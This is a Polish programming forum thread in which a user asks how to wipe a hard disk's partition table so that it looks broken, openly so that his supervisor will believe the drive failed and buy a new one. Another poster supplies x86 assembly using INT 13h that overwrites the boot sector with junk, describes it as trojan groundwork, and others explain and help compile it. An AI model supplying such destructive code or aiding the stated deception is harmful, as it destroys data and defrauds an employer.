Zamazywanie danych na hdd

0

SZukam pomocy !! Chodzi mi o to jak w pascalu lub c zamazać dysk ! Zeby wygladało tak jakby był uszkodzony. ?? please Help me !
Wiem ze bylo to mozliwe przy uzyciu debug z dosa ale niestety nie wiem jak. I nie chodzi mi o dyskiedki tylko hdd. z góry dzieki,!

0

komu chcesz to zrobic ?.. bo chyba nie sobie.. a i pamietaj. kazdy program powinien byc przetestowany przed uzyciem.

0

to jest mi potrzebne do tego aby windows nie wykrył dysku a bios tak. Jezeli zobaczy to mój przełożony to stwierdzi ze dysk jest padnietyi kupi nowy ! Co do stestowania to tesh jestem takiego zdania ale są wyjątki !

0

a i pamietaj. kazdy program powinien byc przetestowany przed uzyciem.

A jak u siebie przetestować wirusa,albo program niszczący pliki co?

0

A jak u siebie przetestować wirusa,albo program niszczący pliki co

wyciagasz dyski podlanczasz jakis stary 300mb z Np min95 i sprawdzasz !

0

A jak u siebie przetestować wirusa,albo program niszczący pliki co

wyciagasz dyski podlanczasz jakis stary 300mb z Np min95 i sprawdzasz !

Skoro go stworzyłeś sam, to wiesz jak on działa (choć może nie zawsze....:-) ) i tworzysz mu kwarantanne...
Kev

0

Sorki ale tresc odchodzi od tematu !!! ja szukam odpowiedzi na pytanie zadane w topicu.

0

chyba nieznajdziesz tutaj odpowiedzi. Praktycznie same tu sztywniaki (truposzcze) bo jak ja wysłałem wiadomosc to nikt nieodpisał. Pewnie to przez te zmainy podzielenie form na czesci (Najwiecej ma delphi zużycia). Więc mam apel:
Ludziska ruszcie sie i pomagajcie ludziom. Niekażdy da sam sobie rady z problemami!!

0

Sztywniaki truposze??? heh

Nie da się software'owo uszkodzić na tyle dysk żeby Ci go wymienił przeozony, bo przed wymianą wystarczy założyć partycje szczelić formata i sprawdzić czy są uszkodzone sektory.

0

a i pamietaj. kazdy program powinien byc przetestowany przed uzyciem.

A jak u siebie przetestować wirusa,albo program niszczący pliki co?

a na ch*** robic takie programu mistrzu??

0

nie kcem go uszkodzic tylko zamazac na nim wszystkie dane !!!! i to w taki sposób zeby nie bylo na nim nawet partycji !. programiki takie czasem po prostu trzeba robic !!! dostałem zamówienie i musze sobie z nim poradzic>!

0

HEY!!

Nic Ci to nie da, partycje można założyć i dysk sformatować. Trzebabyło się zadania nie podejmować.

0

chodzi po prostu o to ze raz musze tak zrobic ! zeby go zamazalo ! a pozniej niech go sobie formatuja i zakladaja partycje !! Mnie to nie interesuje co oni z nim zrobią !

0

chodzi po prostu o to ze raz musze tak zrobic ! zeby go zamazalo ! a pozniej niech go sobie formatuja i zakladaja partycje !! Mnie to nie interesuje co oni z nim zrobią !

Jak tak bardzo ci zalezy to bedziesz musial zrobic to z poziomu ASM'a. Ale ja sie na tym nie znam. :-D
A poza tym i tak te dane beda do odzyskania, jezeli chcodzi ci tylko o uszkodzenie FAT'A (czy partycji). Musialbys totalnie wyzerowac dysk a taki proces troche moze potrwac.

0

Jak tak bardzo ci zalezy to bedziesz musial zrobic to z poziomu ASM'a. Ale ja sie na tym nie znam. :-D
A poza tym i tak te dane beda do odzyskania, jezeli chcodzi ci tylko o uszkodzenie FAT'A (czy partycji). Musialbys totalnie wyzerowac dysk a taki proces troche moze potrwac.

Jeżeli podziurawi dysk zerami (w losowych miejscach) i zamaże doszczętnie tablicę partycji i FAT to już może być kłopot z odzyskaniem

0

ale chodzi mi o dokladne prosedurki i funkcje jakich mozna uzyc !

0

:-D siemacie tu aDm z irca...
dobra powiem Ci jak to zrobic...
zrobilem niedawno takie cos na podszeby trojana...

asm
mov ax,0201h
mov bx,(offset bufor)
mov cx,0001h
mov dx,0080h
int 13h
jc dajemy_spokoj

    mov     ax,0301h                
    inc     cl                      
    int     13h                     
                                   
                                    
                                  
    jc      blad          

    mov     ax,0301h                
    dec     cl                      
    xor     bx,bx                 
    int     13h                  

blad:
ret

bufor db 512 dup(0)

end;

:-|

0

Skoro chcesz, żeby tylko pod Windowsem nie wykrywało dysku to po prostu zmień sobie partycję na linuksowską lub w ogóle nic nie ustawiaj (bierzesz PartMana, zmieniasz format partycji i ani dos, ani winda nie widzą). Po co się bawić.

0

na asmie sie nie znam potrzebuje opisu w pascalu lub delphi lub w c/c++. Tu nie chodzi i sciagniecie czy zamiane partycji tylko o zniszczenia fata.(logiczne)

0

na asmie sie nie znam potrzebuje opisu w pascalu lub delphi lub w c/c++. Tu nie chodzi i sciagniecie czy zamiane partycji tylko o zniszczenia fata.(logiczne)

To to co masz możesz spokojnie wkleić do TP (od 7.0) lub Delphi.
Spokojnie to nie znaczy, że analizowałem ten kod :) Nie dam ci gwarancji, że to co tam jest napisane działa tak jak chcesz.

[dopisane]
No troszkę poanalizowałem (ciekawość...)

asm
mov ax,0201h //Funkcja odczytująca 1 sektor z dysku
mov bx,(offset bufor) //bufor, do którego zapisujemy sektor
mov cx,0001h //odczyt 1 sektora z 0 cylindra
mov dx,0080h //z 0 głowicy dysku twardego
int 13h //wywołujemy tą funkcję
jc dajemy_spokoj //jeżeli wystąpił błąd to do widzenia.

mov   ax,0301h         //funkcja zapisująca jeden sektor
inc   cl            //zwiększamy nr sektora
int   13h           //i wywołujemy tą funkcję
                
                 
                
jc   blad      //błąd? no to do widzenia

mov   ax,0301h         //znowu zapisujemy
dec   cl            //tym razem zmniejszamy nr sektora
xor   bx,bx      //zapisujemy zawartość ES:0 ? hmm więc jakieś śmieci   
int   13h          //i wywołujemy znowu funkcję

blad:
ret

bufor db 512 dup(0)

end;

Szczerze mówiąc, to nie licząc tego, że nie istnieje label: dajemy_spokoj i że jakbym ja pisał program to ta funkcja pewnie by mi go całego rozwaliła (brak zapisu na stos i zdejmowania rejestrów, co ja zwykle robię w funkcji, a nie w programie :) ) to z tego co zrozumiałem to ten program robi mniej więcej tak:

var
Bufor: array [0..511] of Byte;
begin
Bufor := DyskTwardy.Glowica[0].Cylinder[0].Sektory[1];
DyskTwardy.Glowica[0].Cylinder[0].Sektory[2] := Bufor;
DyskTwardy.Glowica[0].Cylinder[0].Sektory[1] := Śmieci;
end;

0

co ty chcesz ona robi to co ma robic sciagaj kompilator assemblera i tyle bo w delphi czy w pascalu moze to nie isc gdy dasz to jako wstawke
dalem kod procedury ktora robi to co chciales wiecej mnie ie obchodzi

0

no fakt kod jest dobry ale ten label i takie inne rzeczy nie pojdzie mi pod delphi a ja kcem wiedziec jak to wszystko dziala a nie tylko wkleic !

0

no fakt kod jest dobry ale ten label i takie inne rzeczy nie pojdzie mi pod delphi a ja kcem wiedziec jak to wszystko dziala a nie tylko wkleic !

Jak działa mniej więcej napisałem. Ale prawdę napisał aDm. W Delphi pod windą chyba to nie pójdzie ze względu na przerwania :(

0

Wiesz... Weź duży magnes (najlepiej ze starego dysku) i pojeźdź nim troszke po HDD. Efekt murowany, a z ponownym uruchomieniem też nie powinno być problemu.

0

hyhhy dobre _____

tylko że ja zorbiłem virusa który zniszczył mi Fat32 ehhhh szcześnie jednak mi sprzyja bo 2 dni przed zniszceniem wgrałwm mÓj katalog na plyte cd-rw _____________

0

jest mnóstwo wspaniałych odpowiedzi ale zadnej która moglaby mi pomóc. no moze poza tym kodem w asmie ale i tak on w delphi nie dziala !

0

Nie bardzo wiem o co ci chodzi. Dlaczego nie skompilujesz sobie tamtego kodu w asemblerze, lub nie znajdziesz jakiegos wirusa, ktory niszczy dysk, lub nie rozmagnesujesz go magnesem ;-) . Po co ci program w dlephi do nieszczenia dysku? Chcesz ogladac postep jego destrukcji :-D A jak dostales zlacenie :-D to mozesz wirusa/ ten kod skompilowac w zasoby programu, zrobic jakies niepotrzebne bajery, typu progress-bar strt button :) i po prostu uruchamiac go z tych zasobow. Tylko komu potrzebne takie cudo :-)

0

Jak to wszystko dziala???
Wiesz naprawde nie chce mi sie tego tlumaczyc przecieŻ chciales go zamazac wiec..?? poco Ci wiedziec jak dziala?? no robi to co chciales

0

okudalo mi sie go skompilowac. dodalem label dajemy_spokoj
a pod nim ret czy tak moze byc ??

0

A ja kiedyś Napisałem wyjebany w kosmos edytor textu i deinstalator do niego, ale nie chciało mi sie wpisywać ścieżki. Po odpaleniu deinstalatora był efekt, jakby się dłużej prog kompilował, a po 2-3 sekundach zaczeły znikać iconki z pulpitu ;) Przy okacji: polecam program Lost&Found - uratował mi skoorę

1 użytkowników online, w tym zalogowanych: 0, gości: 1